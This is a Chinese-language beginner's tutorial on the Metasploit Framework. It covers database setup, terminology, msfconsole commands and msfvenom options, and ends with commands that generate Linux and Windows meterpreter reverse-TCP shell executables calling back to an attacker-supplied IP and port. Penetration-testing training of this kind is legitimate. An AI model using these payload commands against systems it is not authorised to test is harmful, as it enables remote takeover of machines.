前言
Metasploit
就是一个漏洞框架。它的全称叫做The Metasploit Framework
,简称叫做MSF
。Metasploit
作为全球最受欢迎的工具,
不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。
0x01 基本操作
1、运行
终端中输入msfconsole
2、建立搜索缓存(数据库)
启动PostgreSQL
数据库服务:service postgresql start
监听5432
端口
初始化Metasploit
数据库:msfdb init
查看数据库联接情况:msfconsole db_status
建立数据库缓存:msfconsole db_rebuild_cache
3、专业术语
– Exploit,攻击工具/代码
– Payload,攻击载荷
– Shellcode
– Module,模块
– Listener,监听器
4、常用命令
show exploits – 查看所有可用的渗透攻击程序代码
show auxiliary – 查看所有可用的辅助攻击工具
show options – 查看该模块所有可用选项
show payloads – 查看该模块适用的所有载荷代码
show targets – 查看该模块适用的攻击目标类型
search – 根据关键字搜索某模块
info – 显示某模块的详细信息
use – 进入使用某渗透攻击模块
back – 回退
set/unset – 设置/禁用模块中的某个参数
setg/unsetg – 设置/禁用适用于所有模块的全局参数
save – 将当前设置值保存下来,以便下次启动MSF终端时仍可使用
0x01 Metasploit功能程序
msfvenom
(攻击载荷生成和编码器)
主要参数:
-p payload
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
LHOST,LPORT 监听上线的主机IP和端口
-f exe 生成EXE格式
使用msfvenom -l 可以查看可以利用payload
msfvenom -l | grep windows | grep x64 | grep tcp 选择payload
1、生成可执行文件
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
点击收藏 | 5
关注 | 2